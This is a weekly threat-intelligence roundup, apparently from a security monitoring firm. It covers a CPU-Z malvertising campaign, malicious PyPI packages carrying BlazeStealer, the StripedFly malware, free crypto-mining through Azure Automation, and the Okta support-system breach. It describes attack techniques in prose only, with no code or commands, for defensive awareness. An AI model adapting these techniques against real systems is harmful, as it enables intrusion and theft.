This Week in Cyber 10th November 2023

Analyst insight

This week’s threat roundup includes an update on how the Okta breach happened, interesting researcher findings and new methods of malware delivery being found in the wild. The Okta breach highlights the downsides of trusting third party companies with personal data. The breach followed a separate incident where personal information of current and former Okta employees was exposed due to a breach in their healthcare coverage vendor's system. Unfortunately, data breaches can be completely out of an organisations control which reinforces the need for 24/7 monitoring to keep your networks and personal information safe. Moreover, attackers are becoming increasingly sneaky with the methods used to deliver malware as highlighted in the malicious python packages and malvertising campaign below.

Malvertising Campaign Exploits Fake Windows News Portal to Distribute CPU-Z Malware

A recent malvertising campaign has been discovered utilising fake websites posing as a legitimate Windows news portal, such as WindowsReport[.]com, to spread a malicious installer for CPU-Z, a popular system profiling tool. The campaign employs deceptive Google Ads that redirect unsuspecting users searching for CPU-Z to the fake portal. Simultaneously, users who are not the intended victims are directed to an innocuous blog as a cloaking technique.

The malicious installer contains a PowerShell script loader known as FakeBat, facilitating the deployment of RedLine Stealer on compromised hosts. This tactic of mimicking trusted software portals to distribute malware via deceptive ads is not uncommon. Additionally, cybersecurity firm eSentire highlighted a new attack method called Wiki-Slack, exploiting a quirk in Slack's rendering of Wikipedia URLs to generate malicious links, potentially leading victims to booby-trapped sites. Threat actors continue to employ evolving tactics, such as adversary-in-the-middle phishing kits and novel attack methods, to bypass security measures and compromise targeted systems.

Malicious Python Packages in PyPI Repository: A Threat to Developer Systems

A set of malicious Python packages have been found in the Python Package Index (PyPI) repository, designed to steal sensitive information from compromised developer systems. These packages appear as obfuscation tools but contain a malware called BlazeStealer. This malware retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim’s computer.

The campaign started in January 2023 and involves eight packages. These packages retrieve a Python script hosted on transfer[.]sh, which gets executed immediately upon their installation. The malware, BlazeStealer, runs a Discord bot and enables the threat actor to harvest a wide range of information, execute arbitrary commands, encrypt files, and deactivate Microsoft Defender Antivirus on the infected host. Most downloads of the rogue packages originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being taken down.

Unveiling StripedFly: A Stealthy, Enigmatic Cyber Threat

Kaspersky researchers have recently exposed StripedFly, a remarkably advanced malware strain that has eluded detection for over five years, infecting a staggering one million devices worldwide. Operating incognito as a cryptocurrency miner, StripedFly is a complex modular framework infiltrating both Linux and Windows systems. Leveraging a custom EternalBlue SMBv1 exploit linked to the Equation Group, the malware downloads binary files, executes PowerShell scripts, and supports plugin-like features for data harvesting and self-removal.

StripedFly's unique characteristics include a TOR network tunnel for covert communication, utilising trusted services like GitLab, GitHub, and Bitbucket, and employing Monero cryptocurrency mining as a smokescreen to evade detection. The complexity of this threat means there is plenty of opportunity for an effective SOC team to catch the communication. StripedFly's leverage of TOR nodes and reliance on C2 networks are something that we could detect and alert on. Our robust monitoring and hypothesis based threat hunts means that we're always on the look out for hostile communications. Not only can we observe these communications but also any eventID generated by the infection; alerting you to even the most persistent of threats.

Researchers Develop Undetectable Crypto Miner Without Incurring Any Cost

Cybersecurity researchers have discovered three different methods to run an undetectable cloud-based cryptocurrency miner. This crypto miner works by leveraging Microsoft Azure Automation service without incurring any charges. This works by abusing a bug in the Azure pricing calculator which makes it possible to execute an infinite number of tasks without being charged. Another method involves creating a test-job and setting the status to ‘Failed’, and then creating another test-job which results in hiding code execution in the Azure environment. Fortunately, SafeBreach have made a proof-of-concept named CloudMiner and sent all results found to Microsoft so they can address the potentially harmful issues.

How the Okta Breach Allowed Unauthorised Access and Session Hijacking

Identity and authentication management provider Okta disclosed a recent breach that affected 134 of its 18,400 customers. The unauthorised intruder accessed Okta's systems between September 28 and October 17, 2023, gaining access to HAR files containing session tokens, which were subsequently used for session hijacking attacks. The breach occurred when the threat actor leveraged access to a stolen credential to infiltrate Okta's support case management system. This system misuse involved a service account stored within the system itself, with privileges to view and update support cases.

An investigation revealed that the service account's username and password had been saved in an employee's personal Google account, which had been accessed from the Chrome browser on the employee's Okta-managed laptop. Okta has taken steps to address the breach, including revoking session tokens embedded in the HAR files and disabling the compromised service account. Additionally, they have blocked the use of personal Google profiles in enterprise versions of Google Chrome on Okta-managed laptops.